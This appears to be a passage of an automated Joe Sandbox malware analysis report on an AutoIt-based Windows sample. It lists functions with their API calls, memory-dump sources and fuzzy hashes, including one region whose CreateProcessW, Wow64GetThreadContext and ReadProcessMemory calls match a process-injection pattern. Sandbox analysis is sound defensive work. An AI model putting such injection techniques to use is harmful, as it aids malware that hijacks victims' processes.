                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Init_thread_footer
                                                  • String ID: CALL
                                                  • API String ID: 1385522511-4196123274
                                                  • Opcode ID: 84e1019e618115861b8fb9849afa7fa3c45473b9dea8fc6f033bbea8526f5e26
                                                  • Instruction ID: 1b937c185f2c5d59bfaf2dd23bfc3857c4b275dfaa7d4e19dd484a80c0cec187
                                                  • Opcode Fuzzy Hash: 84e1019e618115861b8fb9849afa7fa3c45473b9dea8fc6f033bbea8526f5e26
                                                  • Instruction Fuzzy Hash: 0A2289706086429FC714DF25C494A2EBFF2BF9A394F14891DF4968B3A2D731E841CB96
                                                  Function 00606EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 00606F6B
                                                    • Part of subcall function 00594ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594EFD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad_wcslen
                                                  • String ID: >>>AUTOIT SCRIPT<<<
                                                  • API String ID: 3312870042-2806939583
                                                  • Opcode ID: 83ad2029c4d76a3f01f05739924972cbb320ca7f4a0d09268c51dd4303bd28fb
                                                  • Instruction ID: c541ccd6523f9e51464eb2f0b98ff6553bdc4dc72e357fb7f677e49167ffbe03
                                                  • Opcode Fuzzy Hash: 83ad2029c4d76a3f01f05739924972cbb320ca7f4a0d09268c51dd4303bd28fb
                                                  • Instruction Fuzzy Hash: 66B173715082029FCB18EF24C4959AFBBE6BFD4310F04495DF496972A2EB30ED49CB92
                                                  Function 0165AC8D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 0165B44B
                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0165B4E1
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0165B503
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1732028781.0000000001659000.00000040.00000020.00020000.00000000.sdmp, Offset: 01659000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1659000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                  • String ID:
                                                  • API String ID: 2438371351-0
                                                  • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                  • Instruction ID: 544e3d33cfa662be414f32a25a6db7e5006cf1f5ba8732f8bd96dbfc1fff16ff
                                                  • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                  • Instruction Fuzzy Hash: 5112CE24E14658C6EB24DF64D8507DEB232EF68300F10A1E9910DEB7A5E77A4F81CB5A
                                                  Function 005AFC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                  • Instruction ID: 660b65701555f5af6121f20e75f1ed4dbcc23e801277cea301feaa9d3e64d07f
                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                  • Instruction Fuzzy Hash: DB31F2B4A04109DBC719DF9AD49096DFBA2FF4A310B2486A5E80ACF656D731EDC1CBD0
                                                  Function 00594ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00594E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00594EDD,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594E9C
                                                    • Part of subcall function 00594E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00594EAE
                                                    • Part of subcall function 00594E90: FreeLibrary.KERNEL32(00000000,?,?,00594EDD,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594EC0
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594EFD
                                                    • Part of subcall function 00594E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,005D3CDE,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594E62
                                                    • Part of subcall function 00594E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00594E74
                                                    • Part of subcall function 00594E59: FreeLibrary.KERNEL32(00000000,?,?,005D3CDE,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594E87
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressFreeProc
                                                  • String ID:
                                                  • API String ID: 2632591731-0
                                                  • Opcode ID: 6a43e5b62880273ba98689438a62e0d937168a2f5645cfdd705b2dea8257ac04
                                                  • Instruction ID: 76fe431d9dfac6d021f59cbf5fc179fc3b4e4432f0c621adb994423e4c8c0ec1
                                                  • Opcode Fuzzy Hash: 6a43e5b62880273ba98689438a62e0d937168a2f5645cfdd705b2dea8257ac04
                                                  • Instruction Fuzzy Hash: 7B11EB32650207AACF25AF64DC0AFAD7BA5BF80750F10441EF542A62D1EE709E469B51
                                                  Function 005C8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: __wsopen_s
                                                  • String ID:
                                                  • API String ID: 3347428461-0
                                                  • Opcode ID: 0268e9729ddaaf4bf4d31b738330da76a20dc8fe7c65f855ececd595a0bf43e9
                                                  • Instruction ID: be810104965009ec17f7ab793b787ae317d489cb4687448643ed234fd5e51be6
                                                  • Opcode Fuzzy Hash: 0268e9729ddaaf4bf4d31b738330da76a20dc8fe7c65f855ececd595a0bf43e9
                                                  • Instruction Fuzzy Hash: 5F11487190410AAFCF09DF98E940EAA7BF5FF48304F144069F808AB312DA31EA11CBA5
                                                  Function 005BE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                  • Instruction ID: f37bb40cde6234f3ae873af3f691605a83a7303d82b97cfe8f9163fcb572a2bd
                                                  • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                  • Instruction Fuzzy Hash: 1DF0F932510A159EC7313EA5AC0EFDA3F98BFD2334F140719F825921D1DB70B80186A5
                                                  Function 005C3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,?,00661444,?,005AFDF5,?,?,0059A976,00000010,00661440,005913FC,?,005913C6,?,00591129), ref: 005C3852
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 677ef260b211077d3ec3e1441ffea276283e8a04759a8108b308ec58f605610d
                                                  • Instruction ID: 5f4107290d46c86431c8ec010a23caa095d043f4f47d6096b8fd60cabca0e32c
                                                  • Opcode Fuzzy Hash: 677ef260b211077d3ec3e1441ffea276283e8a04759a8108b308ec58f605610d
                                                  • Instruction Fuzzy Hash: B8E0E53110622D5EE7312AE69C19FDA3E59BB827B0F058028FC0596581CB10ED0186E1
                                                  Function 00594F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594F6D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: cdef830572adf398378bea6ca54fc2eab9f33d73da1a0ebb8021cad874054402
                                                  • Instruction ID: d88267d98496435380d118bcbdfe67abf218691a650b0ed54c97d0fe815bf4fc
                                                  • Opcode Fuzzy Hash: cdef830572adf398378bea6ca54fc2eab9f33d73da1a0ebb8021cad874054402
                                                  • Instruction Fuzzy Hash: DAF01571105792CFDB349F64E494C66BBE4BF143293248A6EE1EA82621C731AC45DF10
                                                  Function 00592DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00592DC4
                                                    • Part of subcall function 00596B57: _wcslen.LIBCMT ref: 00596B6A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: LongNamePath_wcslen
                                                  • String ID:
                                                  • API String ID: 541455249-0
                                                  • Opcode ID: 49a6867d2e7e3a8248da39e1a8ecd1e2d1262c943e8c9ddcc9f5c1ffb76a5816
                                                  • Instruction ID: 927051ff937b76dff98442e8a356f9d1162246e9f642e407efc2bea95632595e
                                                  • Opcode Fuzzy Hash: 49a6867d2e7e3a8248da39e1a8ecd1e2d1262c943e8c9ddcc9f5c1ffb76a5816
                                                  • Instruction Fuzzy Hash: FDE0CD726001255BCB209398DC09FDA77DDEFC8790F040072FD09D7248D960AD848550
                                                  Function 00592B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00593837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00593908
                                                    • Part of subcall function 0059D730: GetInputState.USER32 ref: 0059D807
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00592B6B
                                                    • Part of subcall function 005930F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0059314E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                  • String ID:
                                                  • API String ID: 3667716007-0
                                                  • Opcode ID: f264bcc6cc8dd938bd13eadc0387728521a324dd5930a66b6f28da9a0d7c9035
                                                  • Instruction ID: f2ee5b62ba9da76ec20344fed38f9d2ddb178de5c77912a67686b6be41374267
                                                  • Opcode Fuzzy Hash: f264bcc6cc8dd938bd13eadc0387728521a324dd5930a66b6f28da9a0d7c9035
                                                  • Instruction Fuzzy Hash: 04E0262130020646CF08BB75981A5BDAF9AFBE2351F40143EF14287162CE244A464252
                                                  Function 005D039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,00000000,?,005D0704,?,?,00000000,?,005D0704,00000000,0000000C), ref: 005D03B7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 1745c2bf8ffe0b1166d04d65153237ab08878d251097f6f6436c731bdc89d2bb
                                                  • Instruction ID: b3d54ec9c6f92f5315e723a480a908e82a05fe97990a7f3ef58d7eba743681f4
                                                  • Opcode Fuzzy Hash: 1745c2bf8ffe0b1166d04d65153237ab08878d251097f6f6436c731bdc89d2bb
                                                  • Instruction Fuzzy Hash: 71D06C3204010DBBDF128F84DD06EDA3BAAFB48714F014000BE1856020C732E832AB90
                                                  Function 00591CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00591CBC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: InfoParametersSystem
                                                  • String ID:
                                                  • API String ID: 3098949447-0
                                                  • Opcode ID: 17258973a4a3c627eab4d57cf8ed83d477715faa4ef7ec776edffefb20490c9f
                                                  • Instruction ID: 8449adf88e6d1822af87a634b21f353b39786e2918d71e2c018d69d6d73c5fae
                                                  • Opcode Fuzzy Hash: 17258973a4a3c627eab4d57cf8ed83d477715faa4ef7ec776edffefb20490c9f
                                                  • Instruction Fuzzy Hash: C8C09B352807059FF3244780FC5AF147756A759B10F045001F60A795E3C3E15430D650
                                                  Function 0165BC90 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNELBASE(000001F4), ref: 0165BCA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1732028781.0000000001659000.00000040.00000020.00020000.00000000.sdmp, Offset: 01659000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1659000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                  • Instruction ID: cf62de77a73f9674c576dd12f0ce5f92f09168452377da14594a7eb8977cc4ad
                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                  • Instruction Fuzzy Hash: F3E0E67494010DDFDB00EFB4DA4969E7FB4FF04301F100165FD01D2281DA309D508A62

                                                  Non-executed Functions

                                                  Function 00629576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005A9BB2
                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0062961A
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0062965B
                                                  • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0062969F
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006296C9
                                                  • SendMessageW.USER32 ref: 006296F2
                                                  • GetKeyState.USER32(00000011), ref: 0062978B
                                                  • GetKeyState.USER32(00000009), ref: 00629798
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006297AE
                                                  • GetKeyState.USER32(00000010), ref: 006297B8
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006297E9
                                                  • SendMessageW.USER32 ref: 00629810
                                                  • SendMessageW.USER32(?,00001030,?,00627E95), ref: 00629918
                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0062992E
                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00629941
                                                  • SetCapture.USER32(?), ref: 0062994A
                                                  • ClientToScreen.USER32(?,?), ref: 006299AF
                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 006299BC
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006299D6
                                                  • ReleaseCapture.USER32 ref: 006299E1
                                                  • GetCursorPos.USER32(?), ref: 00629A19
                                                  • ScreenToClient.USER32(?,?), ref: 00629A26
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00629A80
                                                  • SendMessageW.USER32 ref: 00629AAE
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00629AEB
                                                  • SendMessageW.USER32 ref: 00629B1A
                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00629B3B
                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00629B4A
                                                  • GetCursorPos.USER32(?), ref: 00629B68
                                                  • ScreenToClient.USER32(?,?), ref: 00629B75
                                                  • GetParent.USER32(?), ref: 00629B93
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00629BFA
                                                  • SendMessageW.USER32 ref: 00629C2B
                                                  • ClientToScreen.USER32(?,?), ref: 00629C84
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00629CB4
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00629CDE
                                                  • SendMessageW.USER32 ref: 00629D01
                                                  • ClientToScreen.USER32(?,?), ref: 00629D4E
                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00629D82
                                                    • Part of subcall function 005A9944: GetWindowLongW.USER32(?,000000EB), ref: 005A9952
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00629E05
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                  • String ID: @GUI_DRAGID$F$p#f
                                                  • API String ID: 3429851547-1339572704
                                                  • Opcode ID: a72cfa5cbce04797a872c1287f8449665f55c34206dc9212608d8b3d6316443d
                                                  • Instruction ID: e005edf0d1024815dc41eb4ed046e697c486ca00f58a9b45663bcb43ad56cb50
                                                  • Opcode Fuzzy Hash: a72cfa5cbce04797a872c1287f8449665f55c34206dc9212608d8b3d6316443d
